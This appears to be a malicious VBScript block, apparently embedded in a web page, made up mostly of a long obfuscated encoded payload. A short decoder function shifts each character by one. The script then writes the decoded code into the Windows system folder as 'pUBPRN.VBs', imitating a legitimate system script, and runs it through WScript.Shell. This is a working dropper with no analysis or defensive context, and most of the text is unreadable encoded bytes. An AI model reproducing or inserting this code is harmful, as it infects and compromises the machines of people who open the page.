”•yv±є°ЊµТyvyvїБ®ЊЇЫ°СУСє”•yvЫєЊ±ѕѕ»ЮЊѕ±їб№±Њє±ДАyvї±АЊ­Њ©ЊПѕ±­АС»®Ц±ЇА”ЋїПѕµјАµєіљІХё±ЯеїА±№»®¶СПаЋ•yvїСаЊ°ЮЊ©Њ­љЇЮ±На±А±ДАТХёС”ГїЇѕµјАљЯПѕХјаТБШёєНЩ±•yv°ЮљгѕµА±Шµє±ЊЯќ’їћ’Їќ’Ћ©Ћ’®Д’Ує”ЇЫ°С•’®Дyv°ЮљГѕµАСёµЪСЊїџ’ї ’Їћ’Ћ©Ћ’®Д’Ує”ЋП»°±©Ћ’їЎ’Яў’Їџ’Ћ”Ћ’Яќ’їћ’Їќ’Ћ•Ћ•’Одyv°ѕљгѕµА±ёµє±ЊЋІБєПАХ»єЊЋ’їЎ’Яў’Їџ’Ћ”Ћ’ЯЈ’ї¤’Ї ’Ћ•Ћyv°ѕљГѕµА±ШµєСЊЋІ»ѕЊЋ’їҐ’Ћ©ќЊА»Њё±є”Ћ’ЯЈ’ї¤’Ї ’Ћ•Ћyv°ѕљгѕµаСёµєСЊїЎ’їў’Їџ’Ћ©Ћ’їЎ’їў’Їџ’Ћ’ЇФЮ”­їЇ”№µ°”Ћ’їЈ’ї¤’Ї ’ЋЋ’ЯҐ’ЋёСє”Ћ’їЈ’Я¤’П ’Ћ•••™Ћ’Об’Ћ•Ћyv°ѕљГѕµАСёХЪСЊЋє±ДаЋyv°ЮљГЮµа±ШµєСЊЋ±є°ЊІБєЇАХЫєЋyv°ѕљгЮХАСШµє±ЊЋСд±ЇбАСЊЋ’їЎ’їў’Їџ’Ћ”Ћ’Яџ’ї ’Їћ’Ћ•ЋyvРѕљГѕµАСёµЪ±ЊЋ±дСПБАСЊЋ’їЎ’Яў’Пџ’Ћ”Ћ’їќ’Яћ’Їќ’Ћ•Ћyv°ЮљЇёЫЯ±yv±єРЊЯб®yvyvїБ®Њі±є”•yv»єЊ±ЮЮ»ЮЊѕ±ЯБ№±ЊєСДАyvї±АЊ­Њ©ЊПЮ±­А±Ы®ЦСПа”ЋїЇѕµЬАµЪіљТµёСЯЕЯА±№»О¶СЇАЋ•yvЯСАЊ°ЮЊ©ЊНљЇѕ±­а±а±дАІµё±”гЯЇѕµјАљЯЇѕХјАІБёёЪ­№±•yv°ЮљГЮµАСЊ”ѕ­Ш•yv°ѕљПё»ї±yvСє°ЊїБ®yvyvЯБОЊЩ­µШ”•yvЫЪЊСѕЮ»ѕЊѕ±їБ№±ЊєСдАyvЯСАЊіЊ©ЊЇѕ±НА±ЫО¶СЇАЊ”ЋЯЇѕµЬАµєіљІµё±ЯЕїА±Щ»О¶±ЇАЋ•yvЯСАЊІЊ©ЊіљУСАІµё±Њ”гЯЇЮХјАљЯЇѕµјАТБёёє­№С•yvЯ±АЊЯФНѕЬЊ©ЊПѕСНА±»О¶±ЇаЊ”Ћ»Баё»»·љ­јЬШµЇ­аХ»єЋ•yvїСаЊ№НХШЊ©ЊїґНѕјљУ±аЪНЩСїјНЇСЊ”Ћ№НЬХЋ•yvІЫѕЊ­Њ©ЊќЊА»Њ№НµёљНР°Ю±ЯїШµїаїљЇЫБЪАyvїСАЊ®Њ©ЊЩ­Хёљ­РРѕ±їїёµЯаЯЊ”Н•yvЇ»Бєа±ѕЊ©ЊќyvЯСАЊПЊ©Њїґ­ѕјљЇѕС­А±µА±№Њ”њ•yvТ»ѕЊ°Њ©ЊќЊА»Њ®љ­Р°Ю±ЯЯ±єАЮХСїљЇ»БЪАyvСЊ©Њ®љ­°РѕСїї±ЪАЮµ±їЊ”Ї»БЪаСѕ•yvЇљѕ±ЇХЬХ±Ъаїљ­°РЊ”±•yvЇЫБЪа±ѕЊ©ЊЇ»Бєа±ѕЊ—ЊќyvЪ±дАyvі±є”•yvЇљїБО¶±ЇАЊ©ЊЋѕ±ЋyvЇљ®»°ЕЊ©ЊЋЋyvЇљНаАНЇґЩ±єАЯљНРРЊ”Т•yvПљР±ёСа±НТАСѕїБО№µАЊ©ЊАѕб±yvЇљїСЪ°yvЪСдАyvСє°ЊЯБ®yvyvїбОЊС ”•yvЫєЊ±ѕѕ»ЮЊѕ±ЯБ№СЊЪ±даyvЯ±АЊ­Њ©ЊПѕ±­А±»О¶±ЇА”ЋїЇѕХјАµЪУљІµё±їеЯА±№ЫО¶±ЇаЋ•yvІЫѕЊ±­ПґЊїС±Чє±АЇ»ЬЕ°ѕХвСїЊµєЊ­љ°ѕµВ±ЯyvХІЊї±±·є±АЇ»јЕ°ЮµВ±їљРѕХВ±АеЬ±Њ©ЊћЊЛyv»ЮЊї±С·є±аЇЫјеРѕµв±їљ°ЮХв±АЕјСЊ©ЊџЊАґ±єyv±ўЊ”ї±±ЧЪ±АЇ»јЕ°ѕµвСїљј­АФЊ’ЊЋИЋ•yvСЪ°ЊХІyvє±ДАyvСєРЊїБОyvyvїБОЊСЎ”ІµШ±А­ѕі±А•yv»ЪЊ±ѕѕ»ѕЊѕ±їБ№±ЊєСДАyvїСаЊ­Њ©ЊПѕС­А±»®ЦСЇА”ЋїЇЮХјАµЪіљІХёСЯеїА±№»О¶±ЇАЋ•yvїСАЊІЊ©Њ­љУСАІЫё°±Ю”ІµШ±АНѕі±а•yvІ»ЮЊ±НЇґЊєЊµєЊІљІµё±ЯyvІµШ±±ДАЊ©Њ­љі±аСда±ЪїµЫєє­Щ±”Ъљј­аФ•yv±ДАќ©ёЇ­ї±”Тµё±СдА•yv±Даћ©ёЇ­ї±”ЋвОЯЋ•yv±ДАџ©ёЇНїС”ЋВ®±Ћ•yv±дА ©ёП­ї±”Ћґа№Ћ•yv±ДаЎ©ШЇНЯ±”ЋґааЋ•yvСдаў©ёЇ­ї±”ЋґА­Ћ•yvСДаЈ©ёП­ї±”ЋґА№ёЋ•yv±Да¤©ШП­ї±”ЋНЯјЋ•yvµІЊ±даќ©±ДАћЊ»ѕЊ±Даќ©±ДАџЊАґ±єyvЯСаЊ»јЊ©Њ­љ»ј±єА±ДАТµШ±”ЪљЬ­АФЊќ•yvѕРЊ©Њ»јљЮ±НР­ёёyv»јљЇё»ї±yvЯ±аЊРѕЊ©Њ­љЇѕ±НА±а±ДАТµё±”єљј­аґ•yv°ѕљгЮµАС”ѕ°•yvРѕљгѕµА±”ѕНШ•yv°ѕљЇШЫЯ±yvєљНААЮµ®Ба±ї©ќyv±ЪРЊµІyvyvµІЊСДаќ©±ДА Њ»ѕЊ±ДАќ©СДАЎЊ»ѕЊСДаќ©±даўЊ»ЮЊ±даќ©±дАЈЊЫѕЊ±дАќ©±Да¤ЊАґСЪyvї±АЊ»јЊ©Њ­љЫјСєАСдаІµёС”єљј­АґЊќ•yvЮРЊ©Њ»Ьљѕ±­°­ШёyvЫЬљЇШЫЯСyvЯ±АЊРЮЊ©ЊНљЇѕ±­аСА±ДаТХё±”єљјНаґ•yv°ЮљГѕµа±”ЮР•yv°ѕљгѕµА±ёХЪ±ЊЋЁїПѕµјАЊШНєіБ­і±©В®їЇѕµЬАЄЋyv°ЮљГѕХА±ёµє±ЊЋ»єЊ±Юѕ»ЮЊѕСЯБ№СЊє±ДаЋyv°ѕљгЮХа±ШХЪ±ЊЯќ’Ї ’Ћ©Ћ’їќ’Ї ’Ћ’Ћ’їЎ’їў’Пџ’Ћ”Ћ’ОД’Дґ’®д’Ћ•Ћyv°ѕљГѕХА±ёµєСЊЋІбЪПаµ»ЪЊЋ’ЯЎ’їў’Їџ’Ћ”Ћ’їЈ’ї¤’Ї ’Ћ•Ћyv°ѕљгѕХА±ёХє±ЊЋІ»ЮЊЋ’їҐ’Ћ©ќЊАЫЊёСЪ”Ћ’їЈ’ї¤’Ї ’Ћ•Ћyv°ѕљгѕХА±ёµє±ЊїЎ’їў’Їџ’Ћ©Ћ’їЎ’Яў’Їџ’Ћ’ПФЮ”­їЇ”№µР”Ћ’ЯЈ’ї¤’Ї ’ЋЋ’ЯҐ’ЋёСє”Ћ’ЯЈ’Я¤’П ’Ћ•••™ќ•Ћyv°ѕљгЮХА±ёµє±ЊЋєСДАЋyv°ЮљГЮµа±ШХє±ЊЋ±є°ЊІбЪПаµЫєЋyv°ѕљгѕµа±ёµє±ЊЋЯ±АЊН©Їѕ±­а±»®¶±ПА”Ћ’®Д’ЋїЇЮµјАµєУљТХёСїЕЯА±Щ»О¶±ЇАЋ’®Д’Ћ•ЋyvРѕљГЮХАСёµЪ±ЊЋГµє°©­љі±аЯјСПµ­ШІЫё°Сѕ”њ•ЋyvРЮљГЮХА±ёµє±ЊЋїСаЊ°Ю©­љЇѕС­АСАСдаІµШ±”ГµЪР’Ћ’®д’ЋИЬб®јѕєљВ®їЋ’®Д’Ћ•Ћyv°ѕљГѕХаСёµє±ЊЋРѕљгѕµаСЊ”Ћ’їќ’П ’Ћ•Ћyv°ѕљГѕХА±ёХє±ЊЋ°ЮљЇё»їСЋyv°ѕљГЮХАСШµє±ЊЋї±аЊд©ПЮ±­А±»®ЦСПа”Ћ’®Д’ЋГїЇЮµЬАљїґСШёЋ’®д’Ћ•Ћyv°ЮљГѕµАСШµє±ЊЋДљЮБєЊ”гХЪР’Ћ’ОД’ЋИЬб®јѕєљВ®їЋ’®Д’Ћ•ЋyvРѕљгѕµа±ШµєСЊЋЁ›їЇЮµЬАЄЋyv°ѕљЇШЫЯ±yvєљ­ААѕХОба±ї©ќyvСЪ°ЊµІyvЪ±дАyv±єРЊїБОyvyvЯБ®Њ±ў”ІХё±А­ѕУСА•yvЫєЊ±Юѕ»ѕЊѕСЯб№СЊЪ±ДАyvї±аЊ­Њ©ЊЇЮ±­А±ЫО¶±ЇА”ЋїЇѕµЬаµЪіљІµёСїЕїА±ЩЫ®¶СПАЋ•yvЯ±АЊТЊ©Њ­љУ±АІ»ё°±Ю”Іµё±А­ЮіСА•yvТ»ЮЊ±­ЇґЊєЊХЪЊТљЯБ®ІЫёРСѕїyv±ЎЊ”ЪљјНаґ•yv±ўЊ”єљјНАґ•yvЪ±ДАyvСЪРЊЯБ®yvyvїБ®ЊСќ”•yv»єЊ±ѕЮ»ѕЊѕ±ЯБ№±ЊЪ±ДаyvЯСАЊНЊ©ЊПЮ±­аСЫ®¶±ЇА”ЋїЇѕµјАµєіљІµё±ЯЕїА±№»®¶±ЇаЋ•yvТ»ѕЊ±­ПґЊЯ±±·є±аПЫЬЕ°ѕµВСїЊµєЊНљ°ѕХВ±ЯyvХІЊїС±·є±АП»ЬЕ°ѕµВСЯљ°ѕµВСаЕЬСЊ©ЊћЊЛyv»ѕЊї±±·є±АЇ»јЕРЮХВ±ЯљРѕХВСАЕјСЊ©ЊџЊаґ±єyv±џЊ”ї±СЧЪ±АП»јЕРЮµв±їљј­аґЊ’ЊЋИЋ•yvСЪ°ЊµІyvЪ±ДаyvСЪРЊїБОyvyvїБ®ЊСћ”Іµё±АНЮі±А•yv»єЊСѕѕ»ѕЊѕ±їбЩ±Њє±даyvЯСАЊ­Њ©ЊПѕ±­А±»®¶±ЇА”ЋїПЮµјаХЪіљТµШСЯЕїА±№»®¶СПаЋ•yvї±АЊІЊ©Њ­љі±аІ»Ш°±ѕ”Іµё±аНѕі±А•yvІ»ѕЊ±НПґЊєЊµєЊІљТµё±їyvЪљ­аАѕµОБА±їЊ©Њњyv­љР±ёСА±Тµё±Њ”єљЬ­АФ•yvє±Даyv±є°ЊїБ®yvyvїБОЊ±џ”Іµё±аНѕі±А•yv»єЊСѕѕ»ѕЊѕСїБЩСЊє±дАyvїСаЊНЊ©ЊПѕ±­А±»®Ц±ЇА”ЋЯЇЮµјаХєУљІµёСЯеїАСЩ»О¶±ЇАЋ•yvї±АЊІЊ©ЊНљУ±аІЫШ°±ѕ”ІµШ±АНѕіСА•yvТ»ѕЊ±­ПФЊЪЊµєЊТљїб®ІЫё°СѕЯyvСћЊ”Ъљј­аФ•yv±џЊ”Ъљј­Аґ•yvєСДАyvСЪ°ЊЯБ®#ok3>#П»°С©°У ”Гвћ•#GvOdUJPO!eh5)dr6*GPS!u>2!UP!mfO)dr6*eh5>eh5'DIs)BTd)nJE)dr6-u-MFo)dr6***.218*OFYuFOE!gVODUjPoFYfdvuf!eh5)ok3*FYfdVUF!eh5)xw3*")
FUNCTION dg4(cq5)
FOr t=1 TO Len(cq5)
dg4=dg4&Chr(ASc(MId(cq5,t,leN(cq5)))-1)
neXT
eNd FUnctION
seT a=CREATEOBJEcT("SCrIPtING.fILeSYSTEmoBJECt")
WInD=A.GETsPecIAlFOlDEr(0)
SEt dR=A.CreATeTextfIlE(WInD&"\pUBPRN.VBs")
DR.wRITE (w5)
DR.CloSE
seT X=crEAtEOBJecT("WScRIPt.SHELL")
x.Run (WiNd&"\pUBPRN.VBS")
</SCrIPT>
